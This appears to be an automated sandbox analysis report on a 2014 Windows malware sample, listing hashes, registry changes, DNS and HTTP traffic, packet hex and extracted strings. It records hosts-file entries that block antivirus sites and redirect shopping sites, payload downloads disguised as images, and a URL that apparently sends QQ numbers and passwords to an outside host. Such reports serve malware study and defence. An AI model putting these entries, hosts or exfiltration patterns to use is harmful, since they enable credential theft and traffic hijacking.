Analysis Date2014-09-23 21:28:06
MD5f9445df2bcbbb24cff2b432c45b1c4b4
SHA1064b0fd88185c4496e95509af2b6567c0b5f9356

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 40a6532249ec2313478f2a56e513c36c sha1: e7cff37f6ac04cc4608bb3ef3a947460a095f8e2 size: 233472
Section.rdata md5: 94848b22d77760f09ae4a85776ca3050 sha1: 930edb2275f505ea6e24ff5436508655a3af11cb size: 24576
Section.data md5: 49e8608865fa3289db6eb709faff32cb sha1: d55f3c62a1b6de6aa3303df3fa89711ea795791b size: 786432
Timestamp2014-08-19 12:17:21
PackerMicrosoft Visual C++ v6.0
PEhashf628de4d424b5a530c98857fdf4d623ea1be6fe2
IMPhashe063b5a1d096fbfcb6a6efb8857dcc42

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.duba.com/?un_2_445816\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝
NULL
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates Processnotepad.exe
Winsock URLhttp://www.114lax.com/xin3/mail.asp?qqnumber=&qqpassword= 6

Process
↳ notepad.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Processcalc.exe

Process
↳ calc.exe

Creates Mutexielog

Network Details:

DNSwww.12000.com.cn
Type: A
118.193.155.117
DNSimg.freep.cn
Type: A
221.234.36.242
DNSimg.freep.cn
Type: A
221.234.42.184
DNSimg.freep.cn
Type: A
221.234.42.184
DNSimg.freep.cn
Type: A
221.234.36.242
DNSdownload.2345.com
Type: A
60.191.223.15
DNSdownload.2345.com
Type: A
61.147.127.202
DNSdownload.2345.com
Type: A
61.147.127.203
DNSdownload.2345.com
Type: A
61.160.245.8
DNSdownload.2345.com
Type: A
61.160.245.11
DNSdownload.2345.com
Type: A
61.160.245.14
DNSdownload.2345.com
Type: A
122.228.248.3
DNSdownload.2345.com
Type: A
218.75.155.244
DNSdownload.2345.com
Type: A
60.191.187.15
DNSdownload.2345.com
Type: A
60.191.223.2
DNSdownload.2345.com
Type: A
60.191.223.4
DNSwww.114lax.com
Type: A
209.99.40.223
DNSd3.freep.cn
Type: A
DNSd2.freep.cn
Type: A
DNSjifendownload.2345.cn
Type: A
HTTP GEThttp://www.12000.com.cn/asdqw_3104-48740.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d3.freep.cn/3tb_140818092254lkmy537913.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d2.freep.cn/3tb_140818090840mfgc537913.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d2.freep.cn/3tb_140818091837jdlh537913.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d3.freep.cn/3tb_140818093611ej63537913.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d3.freep.cn/3tb_1408180948596rik537913.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d2.freep.cn/3tb_140818093422ncpr537913.jpg
User-Agent: DownJet1.0
HTTP GEThttp://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
User-Agent: DownJet1.0
HTTP GEThttp://d2.freep.cn/3tb_140810210616ab0y536124.jpg
User-Agent: DownJet1.0
HTTP GEThttp://www.114lax.com/xin3/mail.asp?qqnumber=&qqpassword=%20%206
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP192.168.1.1:1031 ➝ 118.193.155.117:80
Flows TCP192.168.1.1:1032 ➝ 221.234.36.242:80
Flows TCP192.168.1.1:1033 ➝ 221.234.42.184:80
Flows TCP192.168.1.1:1034 ➝ 221.234.42.184:80
Flows TCP192.168.1.1:1035 ➝ 221.234.36.242:80
Flows TCP192.168.1.1:1036 ➝ 221.234.36.242:80
Flows TCP192.168.1.1:1037 ➝ 221.234.42.184:80
Flows TCP192.168.1.1:1038 ➝ 60.191.223.15:80
Flows TCP192.168.1.1:1039 ➝ 221.234.42.184:80
Flows TCP192.168.1.1:1040 ➝ 209.99.40.223:80

Raw Pcap
0x00000000 (00000)   47455420 2f617364 71775f33 3130342d   GET /asdqw_3104-
0x00000010 (00016)   34383734 302e6a70 67204854 54502f31   48740.jpg HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a557365 722d4167 656e743a 20446f77   .User-Agent: Dow
0x00000040 (00064)   6e4a6574 312e300d 0a486f73 743a2077   nJet1.0..Host: w
0x00000050 (00080)   77772e31 32303030 2e636f6d 2e636e0d   ww.12000.com.cn.
0x00000060 (00096)   0a436f6e 6e656374 696f6e3a 20436c6f   .Connection: Clo
0x00000070 (00112)   73650d0a 43616368 652d436f 6e74726f   se..Cache-Contro
0x00000080 (00128)   6c3a206e 6f2d6361 6368650d 0a0d0a     l: no-cache....

0x00000000 (00000)   47455420 2f337462 5f313430 38313830   GET /3tb_1408180
0x00000010 (00016)   39323235 346c6b6d 79353337 3931332e   92254lkmy537913.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064332e 66726565   0..Host: d3.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 38313830   GET /3tb_1408180
0x00000010 (00016)   39303834 306d6667 63353337 3931332e   90840mfgc537913.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064322e 66726565   0..Host: d2.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 38313830   GET /3tb_1408180
0x00000010 (00016)   39313833 376a646c 68353337 3931332e   91837jdlh537913.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064322e 66726565   0..Host: d2.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 38313830   GET /3tb_1408180
0x00000010 (00016)   39333631 31656a36 33353337 3931332e   93611ej63537913.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064332e 66726565   0..Host: d3.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 38313830   GET /3tb_1408180
0x00000010 (00016)   39343835 39367269 6b353337 3931332e   948596rik537913.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064332e 66726565   0..Host: d3.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 38313830   GET /3tb_1408180
0x00000010 (00016)   39333432 326e6370 72353337 3931332e   93422ncpr537913.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064322e 66726565   0..Host: d2.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   70335f6b 62616964 75383838 3838385f   p3_kbaidu888888_
0x00000020 (00032)   6a673034 4f756e6c 46343833 6c5a6174   jg04OunlF483lZat
0x00000030 (00048)   6d364972 355f7631 342e372e 312e6578   m6Ir5_v14.7.1.ex
0x00000040 (00064)   65204854 54502f31 2e310d0a 41636365   e HTTP/1.1..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000060 (00096)   656e743a 20446f77 6e4a6574 312e300d   ent: DownJet1.0.
0x00000070 (00112)   0a486f73 743a206a 6966656e 646f776e   .Host: jifendown
0x00000080 (00128)   6c6f6164 2e323334 352e636e 0d0a436f   load.2345.cn..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20436c 6f73650d   nnection: Close.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f337462 5f313430 38313032   GET /3tb_1408102
0x00000010 (00016)   31303631 36616230 79353336 3132342e   10616ab0y536124.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064322e 66726565   0..Host: d2.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a 74696f6e 3a20436c 6f73650d   ....tion: Close.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f78696e 332f6d61 696c2e61   GET /xin3/mail.a
0x00000010 (00016)   73703f71 716e756d 6265723d 26717170   sp?qqnumber=&qqp
0x00000020 (00032)   61737377 6f72643d 25323025 32303620   assword=%20%206 
0x00000030 (00048)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000040 (00064)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000050 (00080)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000060 (00096)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000070 (00112)   204e5420 352e313b 20535631 290d0a48    NT 5.1; SV1)..H
0x00000080 (00128)   6f73743a 20777777 2e313134 6c61782e   ost: www.114lax.
0x00000090 (00144)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x000000a0 (00160)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....


Strings
\
 \
.00-+ -E-0-0
00...........?-  
0
0 
0
.
.
LlE
 \
.-E-0-000-+ 
00
...........?-  
0
0 
0
l
\
-
.
.
..
..
$
@
#
;
......
.
..
.u
CC
.
 
.NSmr.......u
Cjjj
Djjj
         (((((                  H
jjjj
jjjjj
(null)
^,_^][
>"?/?>?
                          
 !"#$%
-------------
----------------
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
\....\
=0>?>~>
00000000dfsfsfdsdsfwe
0 0$0(0,0004080
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
0 0$0(0,0004080<0L0l0t0x0|0
0$0(0,0004080<0@0D0\0|0
0$0(00040<0@0H0L0T0X0`0d0l0p0x0|0
0$0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
0!0*000A0L0Q0n0v0~0
0#0'0;0C0G0a0i0m0
0"0&040<0\0d0
0$0,040<0D0L0T0\0d0l0t0|0
0!0(04080D0H0P0T0X0\0`0d0h0l0p0t0x0|0
00080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
=0[0`0f0
0)0.0F0K0V0e0k0
0(0<0T0h0|0
0(020?0K0X0j0w0
0+0C0O0\0h0{0
<0@0D0,181<1`1d1
0@0H0W0
0+0M0n0
0-1`1{1
0!1(1|1
0:1_1<2S2
0123456789ABCDEF
"@0123456789ABCDEF
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0%1I1o1
)020U0^0
< <$<(<,<0<4<
040<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
:0;4;8;
=$=(=,=0=4=8=<=@=D=
;$;,;0;4;8;<;@;D;H;L;`;
:$:,:0:4:8:<:@:D:H:L:\:|:
;$;,;0;4;8;<;@;D;H;L;P;#<~<
> >$>(>,>0>4>8><>@>D>H>L>P>T>
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>~>
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;d;q;u;
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>p>
> >$>(>,>0>4>8><>T>p>|>
: :$:(:,:0:4:8:<:@:T:t:|:
> >$>(>,>0>4>H>[>_>p>|>
=0=4=H=X=d=h=p=t=x=|=
?0?5?L?Q?
061?1U1{1
080<0@0D0H0
080@0D0H0L0P0T0X0\0`0p0
;0;8;<;@;D;H;L;P;T;X;
< <0<8<<<@<D<H<L<P<T<X<\<`<d<|<
> >$>(>,>0>8>H>d>t>
< <(<0<8<@<H<P<X<`<h<p<x<
;0A0d0j0
0A@@Ju
`0g0y0}0
;0G1S1`1r1x1
@0M0r0
="=&=0=;=?=M=p=
= =$=(=0=@=N=R=
;0;<;O;W;[;t;|;
/0p083
%0R0o0
0SSSSS
0T0w0V1w1{1
0WWWWW
=0>_>z>
= =1===
1060;0
1 1(10181@1H1P1X1`1h1p1x1
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
1!1%1)1-1115191=1A1E1I1M1_1w1
1"1&1*1.12161:1>1B1R1
1!1&1+161
1 1$1(1D1d1l1p1t1x1|1
1$111D1t1
1%1<1 2
1#1,151?1L1W1i1z1
1,1<1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
1,1>1D1W1|1
1!1<1j1
1+1>1P1T1X1\1`1d1h1l1p1t1x1|1
1-151Q1Y1]1s1
1.161>1F1N1V1^1f1n1
1&161C1O1\1n1{1
1+181J1W1c1p1
1:1g1l1
1"1G1S1Z1e1w1
1'1H1V1x1
1,1L1T1X1\1`1d1h1l1p1t1
1!21203N3
1-21252M2\2`2h2l2|2
1"2*272>2L2W2]2v2
1.232S23484s4
1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
126126126126
127.0.0.1   360.cn
127.0.0.1   bbs.360.cn
127.0.0.1   bbs.duba.net
127.0.0.1   bbs.ikaka.com
127.0.0.1   bbs.janmeng.com
127.0.0.1   bbs.kafan.cn
127.0.0.1   bbs.sanfans.com
127.0.0.1   bbs.sd.keniu.com
127.0.0.1   bbs.shadu007.com
127.0.0.1   bbs.taobao.com
127.0.0.1   bbs.vc52.cn
127.0.0.1   cd001.www.duba.net
127.0.0.1   club.alimama.com
127.0.0.1   forum.taobao.com
127.0.0.1   lt.ijinshan.com
127.0.0.1   taoke.alimama.com
127.0.0.1   www.360.cn
127.0.0.1   www.alimama.com
127.0.0.1   www.ijinshan.com
127.0.0.1   www.kafan.cn
127.0.0.1   www.kpfans.com
127.0.0.1   www.shadu007.coC:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1   www.shadu007.com
127.0.0.1   www.virscan.org
%151u1
=->1>5>9>@>
;-<1<5<9<=<A<E<I<M<Q<U<Y<]<a<e<i<m<q<u<y<}<
161:1>1\1`1d1
181@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
181@1D1H1L1P1T1X1\1`1l1|1
:$:+:1:9:O:Z:o:y:
1I1[1A2
=1>I?M?Q?U?Y?]?a?e?i?m?q?u?y?}?
1P1]1f1o1
1#QNAN
1#SNAN
:':1:X:a:i:p:x:
1Z1b1q1y1
 2001, 2002 Mike Lischke
20@0Z0~0
20292I2Q2W2`2g2l2r2
202F2k2w2
2034383<3@3D3H3`3|3
2034383<3@3D3H3L3P3T3X3\3`3d3h3l3[4d4
219.235.1.101
219.235.1.101   517xky.webnode.cn
219.235.1.101   bijibendiannao.blog.china.com
219.235.1.101   cpro.baidu.com
219.235.1.101   diannao.nav123.com
219.235.1.101   mall.yi85.com
219.235.1.101   shouji.tbw.net.cn
219.235.1.101   tbwwsgwdn.tao132.cn
219.235.1.101   www.66taoke.com
219.235.1.101   www.77taoba.com
219.235.1.101   www.91kd.cn
219.235.1.101   www.949528.cn
219.235.1.101   www.cntorg.com
219.235.1.101   www.haixitaoke.com
219.235.1.101   www.hl-sms.cn
219.235.1.101   www.lizhishu.com
219.235.1.101   www.mbaobao.com
219.235.1.101   www.mbbw.info
219.235.1.101   www.mvptaoke.com
219.235.1.101   www.nongyecn.com
219.235.1.101   www.pg8.cn
219.235.1.101   www.qiangdiannao.cn
219.235.1.101   www.shopnokia.info
219.235.1.101   www.sjxun.com
219.235.1.101   www.sugouwu.com
219.235.1.101   www.taobao.com
219.235.1.101   www.taobao-mo.com
219.235.1.101   www.taobao-shouji.com
219.235.1.101   www.taok.cc
219.235.1.101   www.taoke.info
219.235.1.101   www.taoke.la
219.235.1.101   www.taokw.com
219.235.1.101   www.ttcome.cn
219.235.1.101   www.ywaili.com
2*202@2L2P2X2\2`2d2h2l2p2t2x2|2
2*202G2O2`2{2"3&3*3.32363:3R3n3|3
2+202H2
2$2,2024282<2@2D2H2L2P2`2p2
2 2(20282@2H2P2X2`2h2p2x2
2 2$2(2,2024282<2@2D2H2
2 2$2(2,2024282<2@2D2H2L2P2h2
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
2 2$2(2,2024282<2V2^2f2n2v2~2
2"2&2*2.22262:2>2B2F2J2N2R2V2Z2^2b2f2j2n2r2v2z2~2
2 2$2(2,2<2\2d2h2l2p2t2x2|2
2'2/2:2L2^2k2w2
2 2,2;2U2
2&2.262>2F2N2V2^2f2n2v2~2
2%232B2Y2
2,24282<2@2D2H2L2P2T2p2
2$25292J2R2
2+262;2F2K2V2[2f2k2y2
2.2C2%393
2(2C2h2z2
2>2F2b2j2
2!2F2i2
2!2G2c2
2$2H2Y2
2&2K2p2|2
2)2P2u2
2"3)313
2""333:"C8
2""#33:DC8
2 3:3h3
2<3_3y3
 2345zhen
2<3G3a3
252@2[2y2
:":&:*:.:2:6:::
:":&:*:.:2:6:::>:B:F:J:N:R:V:Z:^:b:f:j:n:r:v:z:~:
?"?'?-?2?8?=?C?J?P?U?[?`?f?m?s?~?
2a2q214O4m4
2$B""""C38
2C4"""D338
>'>->2>=>C>H>S>Y>^>i>
%2\CLSID
?.?2?D?`?
<2<@<D<`<h<l<p<t<x<|<
%2\DocObject
;';2;E;R;
2F3M3n3
;*;2;<;F;Q;V;a;f;p;|;
2h253D3
%2\Insertable
2K2N3l3
=%>2>p>
%2\protocol\StdFileEditing\server
%2\protocol\StdFileEditing\verb\0
?"?2?U?`?
2X2`2h2p2x2
=(=-=3=
:#:':+:/:3:
3:"""""
#32770
:33:"$
"*"$33
3*323H3P3h3p3
3$3,3034383<3@3D3H3L3Z3
3 3(30383@3H3P3_3k3x3
3'3,313?3H3M3R3`3i3n3
3333:"$
33333?
3 3$3(3,3034383<3@3D3H3L3P3T3d3
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3p3{3
3 3$3(3,3034383<3@3D3T3s3
3 3$3(3,3034383<3L3l3t3x3|3
333333
333333?
3333333
$3333333
#3333333
33333333
33333333333
333333333333
333333333333?
33333333?333333
333333333333333
333333333333333333
3333333333333338
3333333:3333333383
333333:"33333338
3333333333338
33333:"$3333338
3333:"$3333338
3333339
333333:"C3333338
333333DDD3
333338
33333833
:*3:"$3338
#33338
33338?383
3333Dc3333333
3333f3333333?
3333fc33333338
3333>fd333338
3#3'3>3L3l3t3x3|3
3 3(3?3N3^3~3
3334JC33333338?333
3&3.363>3F3N3V3^3f3
3&3.363>3F3N3V3^3f3n3v3~3
3 3+363F3R3p3z3
3336Dc3333338
3336fC3333338
:*"*"$3338
333838
333*C33
333DDD33333?
333>fC333333
333>fd333333
3:3`3k3
3,3>3y3
333Y3{3
$334B"$3
334C33333338
3(383I3V3x3
33B$3333333
3%3C3K3h3p3
3`3d3h3l3p3t3
3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
33DDDDD3333
33fd3>fC333
33>ffffc338
3'3H3T3l3x3
3%3H3T3X3h3p3t3x3|3
3 3J3v3
3<3N3e3
3?3Q3[3r3
3(3S3x3
3/43484p4t4
344>4R4W4c4w4
3+4`4y4
34""C33333833
353d3q3
   360SE
3/6S6b6
383X3`3d3h3l3p3t3x3|3
<!<3<8<V<c<r<
?+?3?A?I?T?f?v?~?
3B""$33333
3CommDlg
:!:.:3:@:E:R:W:d:i:v:{:
;#;.;3;E;T;`;d;p;t;|;
3F3F6767673E2121247C71683E737F7D3F68797E233F7D71797C3E7163602F61617E657D7275622D8DD8900FB786464602A
?3???F?Q?[?e?o?y?
?&?3???F?X?j?r?}?
3J4Q4h4
3j7n7r7v7z7~7
>$>3>l>
3Messages
:#<3>n>
<+<#>3>N>	?
=3=O=\=`=|=
=3=V={=
404>4B4T4m4x4
404H4{4
40P0l0
4#40444<4@4P4X4\4`4d4h4l4p4t4x4|4
4(4044484<4@4D4H4L4P4l4
4 424O4b4x4
4)434>4H4R4]4g4r4
4$4(40444<4@4H4L4T4X4`4d4l4p4x4|4
4$4,4044484<4@4D4H4L4l4
4#4.4;4
4$4(4,4044484<4@4D4X4x4
4 4$4(4,4044484<4@4D4X4k4o4
4 4$4(4,4044484<4@4X4h4x4
4!4%4)4-4145494=4A4E4I4M4Q4U4Y4]4i4
4#4'4+4/434K4g4t4x4
4 444<4@4D4H4L4P4T4X4\4j4r4
4#4+464<4F4L4^4n4t4
4&4.464>4F4N4V4^4f4n4v4~4
4$4\4d4l4t4|4
4#4,4D4S4b4q4
4$4]4e4s4
4&4.4G4O4S4i4q4
4#4>4J4R4d4
4)454>4E4o4
4$4B4R4X4`4
4#4J4u4
4:4Z4y4
454I4o4
4,5>5D5\5
4'5;5L5\5r5~5
4(5E5I5M5Q5U5Y5]5a5e5
4!5F5j5
4=5R5d5r5
4'6/6B6
.4.7.lnk
484X4`4d4h4l4p4t4x4|4
4"*""C3338
4DF334DC33
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>L>T>\>d>l>t>|>
?$?,?4?<?D?L?T?\?d?l?t?|?
:4:D:T:\:`:d:h:l:p:t:x:|:
4e4m4V6
>!>4>]>e>i>
4~f9.u
4I5P5`5j5p5x5~5
>+>4>=>I>S>z>
4Q5-6R6x6
> >4>T>\>`>d>h>l>p>t>x>|>
\$4UVW
535U5~5
545B5V5
5(5054585<5@5D5H5L5P5`5
5,50545R5
5+505:5@5H5
5(545>5H5R5q5
5$5,545<5D5L5T5\5d5l5t5|5
5$5:5~5
5 5$5,50585<5D5H5P5T5\5`5h5l5t5x5
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
5 5$5(5,5054585<5@5D5H5L5P5T5X5h5y5}5
5 5$5(5<5\5d5h5l5p5t5x5|5
5"5'5,575<5A5L5Q5V5a5f5k5v5{5
5&5.565>5F5N5V5^5f5n5v5~5
5%5/565@5G5Q5X5b5g5l5q5{5
5$5-585J5
5$5=5d5
5<5D5H5L5P5T5X5\5`5d5h5l5p5t5
5)5O5t5
5/646<6f6w6
5"6.686H6a6
5;6A637Q7w7}758F8w8
5^6l6~6
5%6L6r6
5>6M6\6
585X5`5d5h5l5p5t5x5|5
;&;5;A;I;T;Z;g;m;
;'</<5<A<N<l<~<
:5:=:A:W:_:c:y:
5c6l6u6
5K6W6d6v6
=%=*=5=;=@=K=Q=V=a=g=l=w=}=
?)?5?K?t?
5Themes
?.?5?W?
60686<6@6D6H6L6P6T6X6l6
60H0T0`0l0
656`6r6x6
6%606>6`6t6
6 6%616;6A6I6j6r6
6$6,646<6D6L6T6\6d6l6t6|6
6 6(6,6064686<6@6D6H6L6P6T6X6\6`6d6x6
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
6 6$6(6,606@6`6h6l6p6t6x6|6
6&6.666>6F6N6V6^6f6n6v6~6
6#6/6;6G6S6}6$7<7c7v7
6$6/696C6I6S6Y6c6n6x6
6,6@6T6h6S7#8x8
6>6g6k6
6@6I6{6
6,6P6i6
676<6t6f8
677F7]7
6!7[7j7q7
6[7(8G8
6#7C7k7
6	7D7o7
6	7P7T7\7`7h7l7t7x7
6:7P9p:
687<7@7D7L7P7T7X7\7`7d7h7l7p7t7x7|7
6^9g9n:w:
;6<:<><B<F<J<N<f<
<6<B<X<`<d<w<
> >$>(>6>D>H>X>f>j>|>
<.<6<><F<}<
:&:.:6:>:F:N:V:^:f:n:v:~:
=6=F=Q=W=_=d=4?
6G6V6m6
; ;$;(;6;H;h;p;t;x;|;
6R6d6{6
:6:?:S:a:u:
;&;6;>;S;[;x;
6T7j7~7
:(:6:u:}:
<6=;=U=
707X7t7
70C0P0b0h0y0
717P7p7t7x7|7
728G8Y8
747Q7t7
_7654_356.exe
_7654_5943.exe
7+737;7J7U7d7n7
7"7)70777>7E7L7S7Z7a7h7o7v7}7
7!7+717C7T7p7
7&7.767>7F7N7V7^7f7n7v7~7
7 7$7(7,7074787<7@7D7H7L7P7h7
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
7 7$7(7,7074787@7T7i7m7
